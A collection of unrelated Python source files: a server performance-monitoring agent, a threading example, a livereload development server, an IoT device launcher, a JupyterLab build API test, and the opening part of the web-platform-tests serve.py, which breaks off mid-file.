of {pid} is {res}') _ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) self.is_java.update({str(port): 1}) except Exception as err: logger.warning(err) self.is_java.update({str(port): 0}) def check_sysstat_version(self): """ Check sysstat version """ try: version = os.popen("iostat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0] v = int(version.strip()) if v < 12: msg = 'The iostat version is too low, please upgrade to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) except IndexError: logger.error(traceback.format_exc()) msg = 'Please upgrade sysstat to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) try: version = os.popen("pidstat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0] v = int(version.strip()) if v < 12: msg = 'The pidstat version is too low, please upgrade to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) except IndexError: logger.error(traceback.format_exc()) msg = 'Please upgrade sysstat to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) @handle_exception(is_return=True) def clear_port(self): """ Clean up ports that have been stopped monitoring :return: """ stop_num = self._msg['isRun'].count(0) if stop_num > 0: port_list = copy.deepcopy(self._msg) # stop all monitoring for ind in range(len(self._msg['port'])): if self._msg['isRun'][ind] > 0: self._msg['isRun'][ind] = 0 self.FGC = {} # reset FGC times self.FGC_time = {} # reset FGC time self.is_java = {} time.sleep(self.port_interval + 5) # Wait for all ports to stop monitoring self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []} # Start monitoring again for ind in range(len(port_list['port'])): if port_list['isRun'][ind] > 0: self.start = {'port': port_list['port'][ind], 'pid': port_list['pid'][ind], 'is_run': 1} del port_list logger.info('Successfully clean up the ports that stopped monitoring.') else: logger.info('There is no port that stoped monitoring.') def register_agent(self, disk_flag=True): """ Timed task. One is register, the other one is clean up the ports that stopped monitoring. disk_flag: Whether to send email when disk space usage is too high. :param :return: """ url = f'http://{cfg.getServer("host")}:{cfg.getServer("port")}/Register' header = { "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=UTF-8"} post_data = { 'host': self.IP, 'port': cfg.getAgent('port'), 'system': self.system_version, 'cpu': self.cpu_cores, 'cpu_usage': self.cpu_usage, 'nic': self.nic, 'network_speed': self.network_speed, 'mem': round(self.total_mem, 2), 'mem_usage': self.mem_usage, 'disk_size': self.total_disk_h, 'disk_usage': self.get_used_disk_rate(), 'disks': ','.join(self.all_disk) } start_time = time.time() disk_start_time = time.time() while True: try: if time.time() - start_time > 8: # register post_data['cpu_usage'] = self.cpu_usage post_data['mem_usage'] = self.mem_usage res = requests.post(url=url, json=post_data, headers=header) logger.info(f"The result of registration is {res.content.decode('unicode_escape')}") start_time = time.time() if time.strftime('%H:%M') == self.timeSetting: # clean up logger.debug('Cleaning up the ports that stopped monitoring.') self.clear_port() if time.time() - disk_start_time > 300: disk_usage = self.get_used_disk_rate() if disk_usage: post_data['disk_usage'] = disk_usage # disk space usage, without % disk_start_time = time.time() if self.maxDiskUsage < disk_usage: msg = f"The disk space usage is {disk_usage/100:.2f}%, it is too high. Server IP is {self.IP}" logger.warning(msg) if self.isDiskAlert and disk_flag: disk_flag = False # Set to False to prevent cleaning up cache continuously thread = threading.Thread(target=notification, args=(msg,)) thread.start() else: disk_flag = True time.sleep(5) except(Exception): logger.error(traceback.format_exc()) time.sleep(1) def clear_cache(self): """ Cleaning up cache. :return: """ logger.info(f'Start Cleaning up cache: echo {self.echo} > /proc/sys/vm/drop_caches') os.popen(f'echo {self.echo} > /proc/sys/vm/drop_caches') logger.info('Clear the cache successfully.') def __del__(self): pass @handle_exception(is_return=True) def port_to_pid(port): """ Get pid based on port :param port: port :return: pid """ pid = None result = os.popen(f'netstat -nlp|grep {port}').readlines() logger.debug(f'The result of the port {port} is {result}') flag = f':{port}' res = [line.strip() for line in result if flag in line] logger.debug(res[0]) p = res[0].split() pp = p[3].split(':')[-1] if str(port) == pp: pid = p[p.index('LISTEN') + 1].split('/')[0] logger.info(f'The pid of the port {port} is {pid}.') return pid @handle_exception(is_return=True) def notification(msg): """ Send email. :param msg: Email body :return: """ url = f'http://{cfg.getServer("host")}:{cfg.getServer("port")}/Notification' header = { "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=UTF-8"} post_data = { 'host': get_ip(), 'msg': msg } logger.debug(f'The content of the email is {msg}') res = requests.post(url=url, json=post_data, headers=header) if res.status_code == 200: response = json.loads(res.content.decode()) if response['code'] == 0: logger.info('Send email successfully.') else: logger.error(response['msg']) else: logger.error('Failed to send mail.')
threading_2.py
### Create thread instance passing in callable class instance ### import threading from time import sleep, ctime loops = [4,2] class ThreadFunc(object): def __init__(self, func, args, name=""): self.name = name self.func = func self.args = args def __call__(self): self.func(*self.args) def loop(nloop, nsec): print("Start loop", nloop, " at: ", ctime()) sleep(nsec) print("loop", nloop, "done at: ", ctime()) def main(): print ("Starting at: ", ctime()) threads = [] nloops = range(len(loops)) for i in nloops: # Create all threads t = threading.Thread(target=ThreadFunc(loop, (i, loops[i]), loop.__name__)) threads.append(t) for i in nloops: # Start all threads threads[i].start() for i in nloops: # wait for completion threads[i].join() print("All done at: ", ctime()) if __name__ == "__main__": main()
__init__.py
import functools import io import logging import mimetypes import os import os.path import posixpath import re import socketserver import threading import time import warnings import wsgiref.simple_server import watchdog.events import watchdog.observers.polling class _LoggerAdapter(logging.LoggerAdapter): def process(self, msg, kwargs): return time.strftime("[%H:%M:%S] ") + msg, kwargs log = _LoggerAdapter(logging.getLogger(__name__), {}) class LiveReloadServer(socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer): daemon_threads = True poll_response_timeout = 60 def __init__( self, builder, host, port, root, mount_path="/", polling_interval=0.5, shutdown_delay=0.25, **kwargs, ): self.builder = builder self.server_name = host self.server_port = port self.root = os.path.abspath(root) self.mount_path = ("/" + mount_path.lstrip("/")).rstrip("/") + "/" self.url = f"http://{self.server_name}:{self.server_port}{self.mount_path}" self.build_delay = 0.1 self.shutdown_delay = shutdown_delay # To allow custom error pages. self.error_handler = lambda code: None super().__init__((host, port), _Handler, **kwargs) self.set_app(self.serve_request) self._wanted_epoch = _timestamp() # The version of the site that started building. self._visible_epoch = self._wanted_epoch # Latest fully built version of the site. self._epoch_cond = threading.Condition() # Must be held when accessing _visible_epoch. self._to_rebuild = {} # Used as an ordered set of functions to call. self._rebuild_cond = threading.Condition() # Must be held when accessing _to_rebuild. self._shutdown = False self.serve_thread = threading.Thread(target=lambda: self.serve_forever(shutdown_delay)) self.observer = watchdog.observers.polling.PollingObserver(timeout=polling_interval) def watch(self, path, func=None, recursive=True): """Add the 'path' to watched paths, call the function and reload when any file changes under it.""" path = os.path.abspath(path) if func in (None, self.builder): func = self.builder else: warnings.warn( "Plugins should not pass the 'func' parameter of watch(). " "The ability to execute custom callbacks will be removed soon.", DeprecationWarning, stacklevel=2, ) def callback(event): if event.is_directory: return log.debug(str(event)) with self._rebuild_cond: self._to_rebuild[func] = True self._rebuild_cond.notify_all() handler = watchdog.events.FileSystemEventHandler() handler.on_any_event = callback log.debug(f"Watching '{path}'") self.observer.schedule(handler, path, recursive=recursive) def serve(self): self.observer.start() log.info(f"Serving on {self.url}") self.serve_thread.start() self._build_loop() def _build_loop(self): while True: with self._rebuild_cond: while not self._rebuild_cond.wait_for( lambda: self._to_rebuild or self._shutdown, timeout=self.shutdown_delay ): # We could have used just one wait instead of a loop + timeout, but we need # occasional breaks, otherwise on Windows we can't receive KeyboardInterrupt. pass if self._shutdown: break log.info("Detected file changes") while self._rebuild_cond.wait(timeout=self.build_delay): log.debug("Waiting for file changes to stop happening") self._wanted_epoch = _timestamp() funcs = list(self._to_rebuild) self._to_rebuild.clear() for func in funcs: func() with self._epoch_cond: log.info("Reloading browsers") self._visible_epoch = self._wanted_epoch self._epoch_cond.notify_all() def shutdown(self): self.observer.stop() with self._rebuild_cond: self._shutdown = True self._rebuild_cond.notify_all() if self.serve_thread.is_alive(): super().shutdown() self.serve_thread.join() self.observer.join() def serve_request(self, environ, start_response): try: result = self._serve_request(environ, start_response) except Exception: code = 500 msg = "500 Internal Server Error" log.exception(msg) else: if result is not None: return result code = 404 msg = "404 Not Found" error_content = None try: error_content = self.error_handler(code) except Exception: log.exception("Failed to render an error message!") if error_content is None: error_content = msg.encode() start_response(msg, [("Content-Type", "text/html")]) return [error_content] def _serve_request(self, environ, start_response): # https://bugs.python.org/issue16679 # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984 path = environ["PATH_INFO"].encode("latin-1").decode("utf-8", "ignore") m = re.fullmatch(r"/livereload/([0-9]+)/[0-9]+", path) if m: epoch = int(m[1]) start_response("200 OK", [("Content-Type", "text/plain")]) def condition(): return self._visible_epoch > epoch with self._epoch_cond: if not condition(): # Stall the browser, respond as soon as there's something new. # If there's not, respond anyway after a minute. self._log_poll_request(environ.get("HTTP_REFERER"), request_id=path) self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout) return [b"%d" % self._visible_epoch] if path == "/js/livereload.js": file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "livereload.js") elif path.startswith(self.mount_path): rel_file_path = path[len(self.mount_path):] if path.endswith("/"): rel_file_path += "index.html" # Prevent directory traversal - normalize the path. rel_file_path = posixpath.normpath("/" + rel_file_path).lstrip("/") file_path = os.path.join(self.root, rel_file_path) elif path == "/": start_response("302 Found", [("Location", self.mount_path)]) return [] else: return None # Not found # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site. with self._epoch_cond: self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch) epoch = self._visible_epoch try: file = open(file_path, "rb") except OSError: if not path.endswith("/") and os.path.isfile(os.path.join(file_path, "index.html")): start_response("302 Found", [("Location", path + "/")]) return [] return None # Not found if file_path.endswith(".html"): with file: content = file.read() content = self._inject_js_into_html(content, epoch) file = io.BytesIO(content) content_length = len(content) else: content_length = os.path.getsize(file_path) content_type = self._guess_type(file_path) start_response( "200 OK", [("Content-Type", content_type), ("Content-Length", str(content_length))] ) return wsgiref.util.FileWrapper(file) @classmethod def _inject_js_into_html(cls, content, epoch): try: body_end = content.rindex(b"</body>") except ValueError: body_end = len(content) # The page will reload if the livereload poller returns a newer epoch than what it knows. # The other timestamp becomes just a unique identifier for the initiating page. return ( b'%b<script src="/js/livereload.js"></script><script>livereload(%d, %d);</script>%b' % (content[:body_end], epoch, _timestamp(), content[body_end:]) ) @classmethod @functools.lru_cache() # "Cache" to not repeat the same message for the same browser tab. def _log_poll_request(cls, url, request_id): log.info(f"Browser connected: {url}") def _guess_type(cls, path): # MkDocs only ensures a few common types (as seen in livereload_tests.py::test_mime_types). # Other uncommon types will not be accepted. if path.endswith((".js", ".JS")): return "application/javascript" if path.endswith(".gz"): return "application/gzip" guess, _ = mimetypes.guess_type(path) if guess: return guess return "application/octet-stream" class _Handler(wsgiref.simple_server.WSGIRequestHandler): def log_request(self, code="-", size="-"): level = logging.DEBUG if str(code) == "200" else logging.WARNING log.log(level, f'"{self.requestline}" code {code}') def log_message(self, format, *args): log.debug(format, *args) def _timestamp(): return round(time.monotonic() * 1000)
launchPad.py
# from Device_Level.Framework.Base_Classes import dataPipe # from Device_Level.Framework.Base_Classes import managementPipe # from Device_Level.Framework.Managers.deviceManager import deviceManager # from Device_Level.Framework.Controllers.commandController import CommandController # from Device_Level.Framework.Controllers.dataController import DataController # from Device_Level.Framework.Controllers.managmentController import ManagementController # from Device_Level.Framework.Launcher.localLauncher import Launcher # from Device_Level.Framework.Test_Sweet.deviceMangerTester import DMTest as DMT from Framework.Base_Classes import dataPipe from Framework.Base_Classes import managementPipe from Framework.Managers.deviceManager import deviceManager from Framework.Controllers.commandController import CommandController from Framework.Controllers.dataController import DataController from Framework.Controllers.managmentController import ManagementController from Framework.Launcher.localLauncher import Launcher from Framework.Test_Sweet.deviceMangerTester import DMTest as DMT from threading import Thread import json import traceback import logging import time CONFIG_PATH = 'Framework/Totality_Config/deviceConfig.json' """ Launch Pad is the main starter to run EVERYTHING. It will read in from the configuration file and find 3 things: The launcher, the data Controller, and the command controller. See those respective classes or the README for what they do. """ if __name__ == '__main__': try: config = None with open(CONFIG_PATH) as configFile: config = json.load(configFile) DID = config["deviceID"] logging.basicConfig(level=config["logLevel"], filename='program.log', filemode='w', format='%(asctime)s - %(levelname)s - %(message)s') logging.info("\n\nLaunching Program") dataPipe = dataPipe.DataPipe() if not config["localOnly"]: managementPipe = managementPipe.ManagementPipe() else: managementPipe = None DM = deviceManager(pipe=dataPipe, manegementPipe=managementPipe, deviceID=DID, test=config["test"], threadLimit=config["threadLimit"], configPath=CONFIG_PATH, localOnly=config["localOnly"]) useLauncher = False if config["launcher"]["args"] != 'None' and bool(config["launcher"]["args"]): launcher = Launcher(**config["launcher"]["args"], deviceManager=DM) useLauncher = True # commandController = CommandController(**config["commandControl"]["args"], DM=DM, deviceID=DID) dataController = DataController(**config["dataControl"]["args"], localOnly=config["localOnly"], pipe=dataPipe, deviceID=DID) managementController = ManagementController(**config["managementController"]["args"], pipe=managementPipe, deviceID=DID, DM=DM) if useLauncher: LT = Thread(target=launcher.starter, name="Launcher_Thread") LT.start() DCThread = Thread(target=dataController.starter, name="DC_Thread") if not config["localOnly"]: # CCThread = Thread(target=commandController.starter, name="CC_Thread") MCThread = Thread(target=managementController.starter, name="MC_Thread") # CCThread.start() MCThread.start() DCThread.start() logging.info("All Threads Launched Successfully") print("All Threads Launched Successfully") if config["test"]: logging.info("Starting Tests ...") print("Starting Tests ...") time.sleep(2) tester = DMT(DM=DM) logging.info("Device_Level Manager Test:") print("Device_Level Manager Test:") tester.starer() except KeyError as KE: print( "Key Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n\n{}".format( KE, traceback.format_exc())) logging.critical( "Key Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( KE, traceback.format_exc())) exit() except TypeError as TE: print( "Key Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n\n{}".format( TE, traceback.format_exc())) logging.critical( "Key Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( TE, traceback.format_exc())) exit() except FileNotFoundError as FNFE: print( "File Not Found Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( FNFE, traceback.format_exc())) logging.critical( "File Not Found Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( FNFE, traceback.format_exc())) exit() except NameError as NE: print( "Name Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( NE, traceback.format_exc())) logging.critical( "Name Error Occurred While Trying To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format( NE, traceback.format_exc())) exit() except Exception as e: print("Failed To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format(e, traceback.format_exc())) logging.critical("Failed To Start IoT Device_Level. Now Exiting Program.\nError Message: {}\n{}".format(e, traceback.format_exc())) exit()
test_build_api.py
"""Test the kernels service API.""" import threading import time from jupyterlab.tests.utils import LabTestBase, APITester from notebook.tests.launchnotebook import assert_http_error class BuildAPITester(APITester): """Wrapper for build REST API requests""" url = 'lab/api/build' def getStatus(self): return self._req('GET', '') def build(self): return self._req('POST', '') def clear(self): return self._req('DELETE', '') class BuildAPITest(LabTestBase): """Test the build web service API""" def setUp(self): self.build_api = BuildAPITester(self.request) def test_get_status(self): """Make sure there are no kernels running at the start""" resp = self.build_api.getStatus().json() assert 'status' in resp assert 'message' in resp def test_build(self): resp = self.build_api.build() assert resp.status_code == 200 def test_clear(self): with assert_http_error(500): self.build_api.clear() def build_thread(): with assert_http_error(500): self.build_api.build() t1 = threading.Thread(target=build_thread) t1.start() while 1: resp = self.build_api.getStatus().json() if resp['status'] == 'building': break resp = self.build_api.clear() assert resp.status_code == 204
serve.py
# -*- coding: utf-8 -*- from __future__ import print_function import abc import argparse import json import logging import os import platform import signal import socket import subprocess import sys import threading import time import traceback from six.moves import urllib import uuid from collections import defaultdict, OrderedDict from itertools import chain, product from multiprocessing import Process, Event from localpaths import repo_root from six.moves import reload_module from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants from wptserve import server as wptserve, handlers from wptserve import stash from wptserve import config from wptserve.logger import set_logger from wptserve.handlers import filesystem_path, wrap_pipeline from wptserve.utils import get_port, HTTPException, http2_compatible from mod_pywebsocket import standalone as pywebsocket EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains " "are mapped to a loopback device in /etc/hosts.\n" "See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup " "for instructions.") def replace_end(s, old, new): """ Given a string `s` that ends with `old`, replace that occurrence of `old` with `new`. """ assert s.endswith(old) return s[:-len(old)] + new def domains_are_distinct(a, b): a_parts = a.split(".") b_parts = b.split(".") min_length = min(len(a_parts), len(b_parts)) slice_index = -1 * min_length return a_parts[slice_index:] != b_parts[slice_index:] class WrapperHandler(object): __meta__ = abc.ABCMeta headers = [] def __init__(self, base_path=None, url_base="/"): self.base_path = base_path self.url_base = url_base self.handler = handlers.handler(self.handle_request) def __call__(self, request, response): self.handler(request, response) def handle_request(self, request, response): headers = self.headers + handlers.load_headers( request, self._get_filesystem_path(request)) for header_name, header_value in headers: response.headers.set(header_name, header_value) self.check_exposure(request) path = self._get_path(request.url_parts.path, True) query = request.url_parts.query if query: query = "?" + query meta = "\n".join(self._get_meta(request)) script = "\n".join(self._get_script(request)) response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query} wrap_pipeline(path, request, response) def _get_path(self, path, resource_path): """Convert the path from an incoming request into a path corresponding to an "unwrapped" resource e.g. the file on disk that will be loaded in the wrapper. :param path: Path from the HTTP request :param resource_path: Boolean used to control whether to get the path for the resource that this wrapper will load or the associated file on disk. Typically these are the same but may differ when there are multiple layers of wrapping e.g. for a .any.worker.html input the underlying disk file is .any.js but the top level html file loads a resource with a .any.worker.js extension, which itself loads the .any.js file. If True return the path to the resource that the wrapper will load, otherwise return the path to the underlying file on disk.""" for item in self.path_replace: if len(item) == 2: src, dest = item else: assert len(item) == 3 src = item[0] dest = item[2 if resource_path else 1] if path.endswith(src): path = replace_end(path, src, dest) return path def _get_filesystem_path(self, request): """Get the path of the underlying resource file on disk.""" return self._get_path(filesystem_path(self.base_path, request, self.url_base), False) def _get_metadata(self, request): """Get an iterator over script metadata based on // META comments in the associated js file. :param request: The Request being processed. """ path = self._get_filesystem_path(request) try: with open(path, "rb") as f: for key, value in read_script_metadata(f, js_meta_re): yield key, value except IOError: raise HTTPException(404) def _get_meta(self, request): """Get an iterator over strings to inject into the wrapper document based on // META comments in the associated js file. :param request: The Request being processed. """ for key, value in self._get_metadata(request): replacement = self._meta_replacement(key, value) if replacement: yield replacement def _get_script(self, request): """Get an iterator over strings to inject into the wrapper document based on // META comments in the associated js file. :param request: The Request being processed. """ for key, value in self._get_metadata(request): replacement = self._script_replacement(key, value) if replacement: yield replacement @abc.abstractproperty def path_replace(self): # A list containing a mix of 2 item tuples with (input suffix, output suffix) # and 3-item tuples with (input suffix, filesystem suffix, resource suffix) # for the case where we want a different path in the generated resource to # the actual path on the filesystem (e.g. when there is another handler # that will wrap the file). return None @abc.abstractproperty def wrapper(self): # String template with variables path and meta for wrapper document return None @abc.abstractmethod def _meta_replacement(self, key, value): # Get the string to insert into the wrapper document, given # a specific metadata key: value pair. pass @abc.abstractmethod def check_exposure(self, request): # Raise an exception if this handler shouldn't be exposed after all. pass class HtmlWrapperHandler(WrapperHandler): global_type = None headers = [('Content-Type', 'text/html')] def check_exposure(self, request): if self.global_type: globals = u"" for (key, value) in self._get_metadata(request): if key == "global": globals = value break if self.global_type not in parse_variants(globals): raise HTTPException(404, "This test cannot be loaded in %s mode" % self.global_type) def _meta_replacement(self, key, value): if key == "timeout": if value == "long": return '<meta name="timeout" content="long">' if key == "title": value = value.replace("&", "&amp;").replace("<", "&lt;") return '<title>%s</title>' % value return None def _script_replacement(self, key, value): if key == "script": attribute = value.replace("&", "&amp;").replace('"', "&quot;") return '<script src="%s"></script>' % attribute return None class WorkersHandler(HtmlWrapperHandler): global_type = "dedicatedworker" path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"), (".worker.html", ".worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> fetch_tests_from_worker(new Worker("%(path)s%(query)s")); </script> """ class WindowHandler(HtmlWrapperHandler): path_replace = [(".window.html", ".window.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> %(script)s <div id=log></div> <script src="%(path)s"></script> """ class AnyHtmlHandler(HtmlWrapperHandler): global_type = "window" path_replace = [(".any.html", ".any.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script> self.GLOBAL = { isWindow: function() { return true; }, isWorker: function() { return false; }, }; </script> <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> %(script)s <div id=log></div> <script src="%(path)s"></script> """ class SharedWorkersHandler(HtmlWrapperHandler): global_type = "sharedworker" path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s")); </script> """ class ServiceWorkersHandler(HtmlWrapperHandler): global_type = "serviceworker" path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")] wrapper = """<!doctype html> <meta charset=utf-8> %(meta)s <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <div id=log></div> <script> (async function() { const scope = 'does/not/exist'; let reg = await navigator.serviceWorker.getRegistration(scope); if (reg) await reg.unregister(); reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope}); fetch_tests_from_worker(reg.installing); })(); </script> """ class AnyWorkerHandler(WrapperHandler): headers = [('Content-Type', 'text/javascript')] path_replace = [(".any.worker.js", ".any.js")] wrapper = """%(meta)s self.GLOBAL = { isWindow: function() { return false; }, isWorker: function() { return true; }, }; importScripts("/resources/testharness.js"); %(script)s importScripts("%(path)s"); done(); """ def _meta_replacement(self, key, value): return None def _script_replacement(self, key, value): if key == "script": attribute = value.replace("\\", "\\\\").replace('"', '\\"') return 'importScripts("%s")' % attribute if key == "title": value = value.replace("\\", "\\\\").replace('"', '\\"') return 'self.META_TITLE = "%s";' % value return None rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")] class RoutesBuilder(object): def __init__(self): self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler), ("POST", "/tools/runner/update_manifest.py", handlers.python_script_handler)] self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)), ("*", "/tools/*", handlers.ErrorHandler(404)), ("*", "{spec}/tools/*", handlers.ErrorHandler(404)), ("*", "/results/", handlers.ErrorHandler(404))] self.extra = [] self.mountpoint_routes = OrderedDict() self.add_mount_point("/", None) def get_routes(self): routes = self.forbidden_override + self.forbidden + self.extra # Using reversed here means that mount points that are added later # get higher priority. This makes sense since / is typically added # first. for item in reversed(self.mountpoint_routes.values()): routes.extend(item) return routes def add_handler(self, method, route, handler): self.extra.append((str(method), str(route), handler)) def add_static(self, path, format_args, content_type, route, headers=None): if headers is None: headers = {} handler = handlers.StaticHandler(path, format_args, content_type, **headers) self.add_handler("GET", str(route), handler) def add_mount_point(self, url_base, path): url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/" self.mountpoint_routes[url_base] = [] routes = [ ("GET", "*.worker.html", WorkersHandler), ("GET", "*.window.html", WindowHandler), ("GET", "*.any.html", AnyHtmlHandler), ("GET", "*.any.sharedworker.html", SharedWorkersHandler), ("GET", "*.any.serviceworker.html", ServiceWorkersHandler), ("GET", "*.any.worker.js", AnyWorkerHandler), ("GET", "*.asis", handlers.AsIsHandler), ("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler), ("*", "*.py", handlers.PythonScriptHandler), ("GET", "*", handlers.FileHandler) ] for (method, suffix, handler_cls) in routes: self.mountpoint_routes[url_base].append( (method, "%s%s" % (url_base if url_base != "/" else "", suffix), handler_cls(base_path=path, url_base=url_base))) def add_file_mount_point(self, file_url, base_path): assert file_url.startswith("/") url_base = file_url[0:file_url.rfind("/") + 1] self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))] def get_route_builder(aliases, config=None): builder = RoutesBuilder() for alias in aliases: url = alias["url-path"] directory = alias["local-dir"] if not url.startswith("/") or len(directory) == 0: logger.error("\"url-path\" value must start with '/'.") continue if url.endswith("/"): builder.add_mount_point(url, directory) else: builder.add_file_mount_point(url, directory) return builder class ServerProc(object): def __init__(self, scheme=None): self.proc = None self.daemon = None self.stop = Event() self.scheme = scheme def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs): self.proc = Process(target=self.create_daemon, args=(init_func, host, port, paths, routes, bind_address, config), name='%s on port %s' % (self.scheme, port), kwargs=kwargs) self.proc.daemon = True self.proc.start() def create_daemon(self, init_func, host, port, paths, routes, bind_address, config, **kwargs): if sys.platform == "darwin": # on Darwin, NOFILE starts with a very low limit (256), so bump it up a little # by way of comparison, Debian starts with a limit of 1024, Windows 512 import resource # local, as it only exists on Unix-like systems maxfilesperproc = int(subprocess.check_output( ["sysctl", "-n", "kern.maxfilesperproc"] ).strip()) soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) # 2048 is somewhat arbitrary, but gives us some headroom for wptrunner --parallel # note that it's expected that 2048 will be the min here new_soft = min(2048, maxfilesperproc, hard) if soft < new_soft: resource.setrlimit(resource.RLIMIT_NOFILE, (new_soft, hard)) try: self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs) except socket.error: logger.critical("Socket error on port %s" % port, file=sys.stderr) raise except Exception: logger.critical(traceback.format_exc()) raise if self.daemon: try: self.daemon.start(block=False) try: self.stop.wait() except KeyboardInterrupt: pass except Exception: print(traceback.format_exc(), file=sys.stderr) raise def wait(self): self.stop.set() self.proc.join() def kill(self): self.stop.set() self.proc.terminate() self.proc.join() def is_alive(self): return self.proc.is_alive() def check_subdomains(config, routes): paths = config.paths bind_address = config.bind_address host = config.server_host port = get_port() logger.debug("Going to use port %d to check subdomains" % port) wrapper = ServerProc() wrapper.start(start_http_server, host, port, paths, routes, bind_address, config) url = "http://{}:{}/".format(host, port) connected = False for i in range(10): try: urllib.request.urlopen(url) connected = True break except urllib.error.URLError: time.sleep(1) if not connected: logger.critical("Failed to connect to test server " "on {}. {}".format(url, EDIT_HOSTS_HELP)) sys.exit(1) for domain in config.domains_set: if domain == host: continue try: urllib.request.urlopen("http://%s:%d/" % (domain, port)) except Exception: logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP)) sys.exit(1) wrapper.wait() def make_hosts_file(config, host): rv = [] for domain in config.domains_set: rv.append("%s\t%s\n" % (host, domain)) # Windows interpets the IP address 0.0.0.0 as non-existent, making it an # appropriate alias for non-existent hosts. However, UNIX-like systems # interpret the same address to mean any IP address, which is inappropraite # for this context. These systems do not reserve any value for this # purpose, so the inavailability of the domains must be taken for granted. # # https://github.com/web-platform-tests/wpt/issues/10560 if platform.uname()[0] == "Windows": for not_domain in config.not_domains_set: rv.append("0.0.0.0\t%s\n" % not_domain) return "".join(rv) def start_servers(host, ports, paths, routes, bind_address, config, **kwargs): servers = defaultdict(list) for scheme, ports in ports.items(): assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1) # If trying to start HTTP/2.0 server, check compatibility if scheme == 'h2' and not http2_compatible(): logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' + 'Requires Python 2.7.10+ or 3.6+ and OpenSSL 1.0.2+') continue for port in ports: if port is None: continue init_func = {"http": start_http_server, "https": start_https_server, "h2": start_http2_server, "ws": start_ws_server, "wss": start_wss_server, "quic-transport": start_quic_transport_server}[scheme] server_proc = ServerProc(scheme=scheme) server_proc.start(init_func, host, port, paths, routes, bind_address, config, **kwargs) servers[scheme].append((port, server_proc)) return servers def startup_failed(log=True): # Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719 if log: logger.critical(EDIT_HOSTS_HELP) else: print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr) sys.exit(1) def start_http_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, doc_root=paths["doc_root"], routes=routes, rewrites=rewrites, bind_address=bind_address, config=config, use_ssl=False, key_file=None, certificate=None, latency=kwargs.get("latency")) except Exception: startup_failed() def start_https_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, doc_root=paths["doc_root"], routes=routes, rewrites=rewrites, bind_address=bind_address, config=config, use_ssl=True, key_file=config.ssl_config["key_path"], certificate=config.ssl_config["cert_path"], encrypt_after_connect=config.ssl_config["encrypt_after_connect"], latency=kwargs.get("latency")) except Exception: startup_failed() def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs): try: return wptserve.WebTestHttpd(host=host, port=port, handler_cls=wptserve.Http2WebTestRequestHandler, doc_root=paths["doc_root"], ws_doc_root=paths["ws_doc_root"], routes=routes, rewrites=rewrites, 